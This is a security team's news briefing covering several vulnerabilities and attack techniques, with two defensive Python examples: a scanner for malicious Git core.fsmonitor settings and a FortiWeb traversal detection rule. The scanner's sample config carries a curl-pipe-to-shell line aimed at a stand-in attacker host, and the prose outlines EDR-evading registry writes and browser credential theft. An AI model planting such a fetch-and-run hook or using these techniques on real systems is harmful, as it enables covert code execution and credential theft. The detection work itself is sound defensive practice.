🛡️ InfoSec Blue Team Briefing

Saturday, November 15, 2025

🚨 Critical Vulnerability Alert

Before we begin today's briefing, we have a critical security alert. CVE-2025-64446, a path traversal vulnerability in Fortinet FortiWeb, has been added to the CISA Known Exploited Vulnerabilities (KEV) catalog.

🎧 Audio Briefing

Good morning. This is your security briefing for Friday, November 14, 2025, covering 8 articles analyzed overnight. All attribution is by the article authors, and all article analysis is automated.

RootUp has published research on abusing Git's core.fsmonitor setting to get arbitrary code execution when a user opens a malicious folder in an IDE. Most IDEs run git status automatically as soon as a folder is opened, and core.fsmonitor in the repository's own .git/config can name an arbitrary command for git to run as its file-system monitor hook, so opening the folder is enough to execute the attacker's command. Because git clone writes a fresh .git/config rather than copying the remote's, the attacker has to deliver the .git directory itself (an archive, a shared drive, a removable device), which is why the technique fits phishing and remote-takeover scenarios.
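
A pre-open check for this trick, added here as an example (not code from the RootUp write-up): it walks a directory of repositories, parses each .git/config with a small hand-written parser instead of invoking git, and reports any core.fsmonitor value that names a command rather than git's boolean switch for the built-in daemon. The two config texts and the repository names in demo_scan() are constructed samples; attacker.invalid and git.example.test are placeholder hosts.

```python
"""Find repositories whose .git/config would make `git status` run a command."""
import os
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Optional, Tuple

SECTION_RE = re.compile(r'^\[\s*([^\s\]"]+)(?:\s+"([^"]*)")?\s*\]')
KEY_RE = re.compile(r'^([A-Za-z][A-Za-z0-9-]*)\s*(?:=(.*))?$')

# Values git treats as a boolean switch for its built-in daemon, not as a command.
BOOLEAN_VALUES = {"", "true", "false", "yes", "no", "on", "off", "1", "0"}


def _parse_value(raw: str) -> str:
    """Unquote a git config value; strip trailing # or ; comments when unquoted."""
    raw = raw.strip()
    if not raw.startswith('"'):
        for marker in "#;":
            cut = raw.find(marker)
            if cut >= 0:
                raw = raw[:cut]
        return raw.strip()
    out, i = [], 1
    while i < len(raw) and raw[i] != '"':
        if raw[i] == "\\" and i + 1 < len(raw):  # \" and \\ escapes inside quotes
            i += 1
        out.append(raw[i])
        i += 1
    return "".join(out)


def parse_git_config(text: str) -> Dict[str, str]:
    """Return {'section.key': value}; covers [section], [section "sub"], indented
    key = value lines, # and ; comments, quoted values. Last value wins, as in git."""
    cfg: Dict[str, str] = {}
    section = ""
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#;":
            continue
        m = SECTION_RE.match(line)
        if m:
            section = m.group(1).lower()
            if m.group(2) is not None:
                section += "." + m.group(2)
            continue
        m = KEY_RE.match(line)
        if m and section:
            value = m.group(2) if m.group(2) is not None else "true"  # bare key == true
            cfg[f"{section}.{m.group(1).lower()}"] = _parse_value(value)
    return cfg


def fsmonitor_command(config_text: str) -> Optional[str]:
    """The command git would run as the fsmonitor hook, or None if unset/built-in."""
    value = parse_git_config(config_text).get("core.fsmonitor")
    if value is None or value.lower() in BOOLEAN_VALUES:
        return None
    return value


def scan_tree(root: Path) -> List[Tuple[Path, str]]:
    """Walk root, inspect every .git/config found, return (config path, command) hits."""
    hits: List[Tuple[Path, str]] = []
    for dirpath, dirnames, filenames in os.walk(root):
        if os.path.basename(dirpath) == ".git":
            if "config" in filenames:
                cfg_path = Path(dirpath) / "config"
                cmd = fsmonitor_command(cfg_path.read_text(errors="replace"))
                if cmd is not None:
                    hits.append((cfg_path, cmd))
            dirnames[:] = []  # nothing else of interest inside .git
    return hits


# Constructed samples: a normal repo config and one carrying a hook command.
CLEAN_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tfsmonitor = true      ; built-in daemon, not a command
[remote "origin"]
\turl = https://git.example.test/team/app.git
"""

MALICIOUS_CONFIG = """[core]
\trepositoryformatversion = 0
\tfilemode = true
\tfsmonitor = "bash -c 'curl -s https://attacker.invalid/stage | sh'"
[remote "origin"]
\turl = https://git.example.test/team/app.git
"""


def demo_scan() -> List[str]:
    """Lay out two constructed repos in a temp dir, scan, return 'repo: command' lines."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, text in (("clean-app", CLEAN_CONFIG), ("shared-folder", MALICIOUS_CONFIG)):
            git_dir = Path(tmp) / name / ".git"
            git_dir.mkdir(parents=True)
            (git_dir / "config").write_text(text)
        return [f"{p.parent.parent.name}: {cmd}" for p, cmd in scan_tree(Path(tmp))]


if __name__ == "__main__":
    for line in demo_scan():
        print("core.fsmonitor command found in", line)
```

Run it over the directory where downloaded archives are unpacked before opening anything in an IDE; a hit means git status, and therefore the IDE, would execute that string. A legitimate hook path such as .git/hooks/fsmonitor-watchman is also reported, since the point is to review every command-valued setting, not to guess which ones are benign.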

Prelude Security details a technique that uses the Windows RegRestoreKey API to modify registry entries while evading EDR detection. The operator builds a modified registry hive file containing the desired keys and values and restores it over an existing key, so the write never passes through the RegCreateKey or RegSetValue calls that EDR sensors conventionally hook, and persistence can be established without producing the usual security telemetry. RegRestoreKey requires SeRestorePrivilege (and producing the hive with RegSaveKey requires SeBackupPrivilege), so this is a post-elevation technique rather than an initial-access one.

dk0m has released ZeroCrumb, a tool that extracts application-bound credentials and cookies from Chrome, Brave, and Edge browsers without elevated privileges. The tool uses Transacted Hollowing to bypass the Chrome Elevation Service and impersonates Chrome instances to access the IElevator COM interface for decrypting sensitive user data.

reconurge has released flowsint, an open-source OSINT graph exploration tool on GitHub designed for ethical cybersecurity investigations. The platform provides visual, flexible graph-based analysis capabilities for analysts and investigators, with explicit restrictions against unauthorized surveillance or privacy violations.

watchTowr Labs reports that Fortinet FortiWeb appliances are affected by CVE-2025-64446, the vulnerability in today's alert: a critical authentication bypass that is being actively exploited in the wild. Attackers combine a path traversal with manipulation of the CGIINFO HTTP header to impersonate administrative users. Versions from 6.3 through 8.0 are affected and patches are available.
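
A triage rule for the two indicators this briefing names, added here as an example (not code from watchTowr Labs or Fortinet): it flags requests whose URL contains a path-traversal sequence after percent-decoding, and requests that carry a CGIINFO header at all, since no ordinary client sends one. The exact FortiWeb endpoint hit in the wild is not part of this briefing, so the rule deliberately keys only on those two signals. The request records are constructed, and the rule assumes a data source that preserves request headers (a proxy or WAF log, or a packet capture), because a plain access log does not record them.

```python
"""Flag requests showing a path-traversal sequence and/or a CGIINFO request header."""
from typing import Dict, List, Tuple
from urllib.parse import unquote

Request = Dict[str, object]


def normalize_path(path: str, rounds: int = 3) -> str:
    """Percent-decode repeatedly (bounded) so %2e%2e%2f and double-encoded
    %252e%252e%252f collapse to '../', then fold backslashes to slashes."""
    for _ in range(rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    return path.replace("\\", "/")


def has_traversal(path: str) -> bool:
    """True if any path segment is '..' after normalization (query string ignored).
    Dots inside a segment such as 'v2..0' are not traversal and are not flagged."""
    clean = normalize_path(path).split("?", 1)[0]
    return any(seg == ".." or seg.startswith("..;") for seg in clean.split("/"))


def suspicious_reasons(req: Request) -> List[str]:
    """Reasons this request matches the indicators; empty list means clean."""
    reasons: List[str] = []
    if has_traversal(str(req["path"])):
        reasons.append("path traversal in URL")
    headers = {k.lower(): v for k, v in dict(req.get("headers", {})).items()}
    if "cgiinfo" in headers:  # header names are case-insensitive
        reasons.append("CGIINFO request header present")
    return reasons


# Constructed sample traffic; 203.0.113.0/24 and 198.51.100.0/24 are documentation ranges
# and the CGIINFO value is a placeholder, not a real payload.
SAMPLE_REQUESTS: List[Request] = [
    {"src": "203.0.113.10", "method": "GET", "path": "/login?redir=%2Fdashboard",
     "headers": {"Host": "waf.example.test", "User-Agent": "Mozilla/5.0"}},
    {"src": "198.51.100.7", "method": "POST", "path": "/static/..%2f..%2fadmin",
     "headers": {"Host": "waf.example.test", "CGIINFO": "constructed-placeholder"}},
    {"src": "198.51.100.8", "method": "GET", "path": "/img/%252e%252e%252f%252e%252e%252fconfig",
     "headers": {"Host": "waf.example.test"}},
    {"src": "203.0.113.11", "method": "GET", "path": "/docs/v2..0/release-notes",
     "headers": {"Host": "waf.example.test"}},
]


def find_suspicious(requests: List[Request]) -> List[Tuple[str, str, List[str]]]:
    """Return (src, path, reasons) for every request with at least one indicator."""
    out: List[Tuple[str, str, List[str]]] = []
    for req in requests:
        reasons = suspicious_reasons(req)
        if reasons:
            out.append((str(req["src"]), str(req["path"]), reasons))
    return out


if __name__ == "__main__":
    for src, path, reasons in find_suspicious(SAMPLE_REQUESTS):
        print(f"{src} {path}: {', '.join(reasons)}")
```

The bounded repeated decoding is the part worth keeping: single-pass decoders miss %252e-style double encoding, while an unbounded loop can be stalled by a deeply nested payload. Treat any CGIINFO hit as worth a look on its own, even without traversal in the same request.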

Silverfort researchers discovered CVE-2025-60704, a Kerberos Constrained Delegation vulnerability affecting Active Directory environments. An attacker in a man-in-the-middle position can exploit it to escalate privileges and impersonate domain users, including administrators. Microsoft has patched the vulnerability and rated it CVSS 7.5.

Google reports that Rust adoption in Android development has brought memory-safety bugs below 20% of Android's total vulnerabilities in 2025. Google measures roughly a 1000x lower memory-safety vulnerability density for Rust code than for C and C++, alongside development-efficiency gains of 20% fewer code revisions and 25% less review time.

The Phuket News reports that Thai cyber police, coordinating with the FBI, arrested 35-year-old Russian national Aleksey Lukashev in Phuket, Thailand. Lukashev is believed to be a GRU officer and world-class hacker linked to cyberattacks targeting government institutions in Europe and the United States.

📰 Articles Covered